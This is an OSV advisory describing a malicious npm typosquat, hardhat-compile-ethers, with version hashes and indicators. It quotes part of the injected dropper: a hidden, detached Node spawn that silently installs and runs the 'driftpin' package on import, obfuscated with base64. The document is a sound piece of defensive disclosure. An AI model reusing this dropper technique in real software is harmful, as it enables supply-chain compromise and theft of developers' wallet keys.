MAL-2026-6705

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/hardhat-compile-ethers/MAL-2026-6705.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6705
Published
2026-07-01T18:41:35Z
Modified
2026-07-01T19:16:50.546845631Z
Summary
Malicious code in hardhat-compile-ethers (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (3bb9781577ff17698d2cb66a6cd832fe8bdda014b30c0c662055a45d42801ac1)

The package's main entry dist/src/index.js contains a payload appended after the legitimate Hardhat exports. On require/import (e.g. when Hardhat loads the user's config), it spawns a detached Node child (spawn(process.execPath, ['-e', code], {detached:true, stdio:'ignore', windowsHide:true})) that runs a base64-decoded command to silently npm install driftpin --no-save --silent --no-audit --no-fund, then require('driftpin') and invoke getPlugin()(), executing attacker-controlled code in the installer's Node process. Both the shell command and the module name 'driftpin' are base64-encoded to hide them from casual inspection, and the spawn options (detached, stdio ignored, windows window hidden) are evasion mechanics. The payload is absent from the TypeScript source (src/index.ts) and only appears in the published dist artifact, indicating post-build injection. The package name mimics legitimate Hardhat/ethers plugins (e.g. @nomicfoundation/hardhat-ethers, hardhat-deploy-ethers) and the README is copied from wighawag/hardhat-deploy, making this a typosquat that delivers a dependency-chain dropper. Installers are typically Hardhat development machines that hold wallet keys and signing material, making arbitrary code execution on import especially damaging.

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "0.4.7"
            ],
            "sha256": "180936274762437e2311a83f716cbbf9fcaaaef8e194b950bfa28192bfb44bf8",
            "modified_time": "2026-07-01T18:42:56Z",
            "source": "amazon-inspector",
            "import_time": "2026-07-01T19:11:25.632444026Z",
            "id": "IN-MAL-2026-007865"
        },
        {
            "versions": [
                "0.4.10"
            ],
            "sha256": "2852e841d953072a439342e58a63f91a6f4047c122d337ad57bc4f4adad45f81",
            "source": "amazon-inspector",
            "modified_time": "2026-07-01T18:42:38Z",
            "id": "IN-MAL-2026-007863",
            "import_time": "2026-07-01T19:11:25.404233578Z"
        },
        {
            "versions": [
                "0.4.12"
            ],
            "sha256": "3bb9781577ff17698d2cb66a6cd832fe8bdda014b30c0c662055a45d42801ac1",
            "modified_time": "2026-07-01T18:41:35Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-007856",
            "import_time": "2026-07-01T19:11:24.475165466Z"
        },
        {
            "versions": [
                "0.4.11"
            ],
            "sha256": "51a9a1265ba62d0c900be1a70b6fb28386f2e25cc3e31855fc5b3f58530cae47",
            "modified_time": "2026-07-01T18:42:18Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-007861",
            "import_time": "2026-07-01T19:11:25.142169343Z"
        },
        {
            "versions": [
                "0.4.8"
            ],
            "sha256": "70318ad0a21e7e2e412adfb362788a771ff49831a01481de94c60d7903634f36",
            "modified_time": "2026-07-01T18:42:46Z",
            "source": "amazon-inspector",
            "import_time": "2026-07-01T19:11:25.528163378Z",
            "id": "IN-MAL-2026-007864"
        },
        {
            "versions": [
                "0.4.6"
            ],
            "sha256": "95bb3eefd23fcfaf7a9da242c86085f6b7d1cda8344a82a8219789beefe60c12",
            "modified_time": "2026-07-01T18:43:07Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-007866",
            "import_time": "2026-07-01T19:11:25.775808651Z"
        },
        {
            "versions": [
                "0.4.5"
            ],
            "sha256": "a1d54b1992fb2f6fa590ca2b76dd65574a18a0659f43294aa2fdf0588abe4062",
            "modified_time": "2026-07-01T18:43:43Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-007870",
            "import_time": "2026-07-01T19:11:26.226038725Z"
        },
        {
            "versions": [
                "0.4.4"
            ],
            "sha256": "d572224fcf90c82c0626008128d7a1fd790e480ec4c3b4fa5292eeb3d610bf81",
            "modified_time": "2026-07-01T18:43:34Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-007869",
            "import_time": "2026-07-01T19:11:26.129866344Z"
        },
        {
            "versions": [
                "0.4.2"
            ],
            "sha256": "dee0fafd7c2ba309f9b3b1ae8f7e4d54c9d82c630bdbaa176044b9e054cf08c9",
            "source": "amazon-inspector",
            "modified_time": "2026-07-01T18:43:17Z",
            "id": "IN-MAL-2026-007867",
            "import_time": "2026-07-01T19:11:25.903639151Z"
        },
        {
            "versions": [
                "0.4.0"
            ],
            "sha256": "55a890434cfd92fb846ba508acebf110f286a083dc029651ebecb781528e6f39",
            "modified_time": "2026-07-01T18:43:59Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-007872",
            "import_time": "2026-07-01T19:11:26.500370955Z"
        },
        {
            "versions": [
                "0.4.3"
            ],
            "sha256": "845a969efc54f4b45826b4bd051aa1adea7c2a983ce97e0665e0c7107f4f2ce3",
            "modified_time": "2026-07-01T18:43:25Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-007868",
            "import_time": "2026-07-01T19:11:26.029254479Z"
        },
        {
            "versions": [
                "0.0.1"
            ],
            "sha256": "c807ea26446e2a048c154c7a3c035c22db3c42ceede57a307195256a3f11e540",
            "modified_time": "2026-07-01T18:43:50Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-007871",
            "import_time": "2026-07-01T19:11:26.358013817Z"
        },
        {
            "versions": [
                "0.4.9"
            ],
            "sha256": "d1e4d2af59e7b9e792f78d9335e437080b45295155a778e9d336e23f809e325f",
            "modified_time": "2026-07-01T18:42:31Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-007862",
            "import_time": "2026-07-01T19:11:25.289124822Z"
        }
    ]
}
References
Credits

Affected packages

npm / hardhat-compile-ethers

Package

Name
hardhat-compile-ethers
View open source insights on deps.dev
Purl
pkg:npm/hardhat-compile-ethers

Affected ranges

Affected versions

0.*
0.0.1
0.4.0
0.4.2
0.4.3
0.4.4
0.4.5
0.4.6
0.4.7
0.4.8
0.4.9
0.4.10
0.4.11
0.4.12

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "hardhat-compile-ethers-0.4.7.tgz",
            "hashes": {
                "sha512_sri": "sha512-jZX1Kng+W6pbRo0AaYeOa9T9Pw2I3jfP4IS+VPjc2btcfG4qr4IH9o6J352wbyVbVrWO0XDDpb8FfJTaADBneg==",
                "sha1": "e718d781b11897329c9747c5fd57a1677ea24110"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "7de1080e1a3fdcfcedbe49bc8d587fb856f3bfc06d8bdc1750f40228fcf45f61",
            "path": "dist/src/index.js",
            "tlsh": "e751e2a32797a1302b370fadcb0b1c5663a352932ad891a0f7ed95121f8218951b39c9"
        },
        {
            "sha256": "d5cdd23b692a6e0a213c2a889a398195837f2033e748241c69dee5257beb6dd1",
            "path": "package.json",
            "tlsh": "41318960cc19cd2307d85595ac7a429361649a470ca6fc2c73a52bbf4f0c2af21b9abd"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/hardhat-compile-ethers/MAL-2026-6705.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]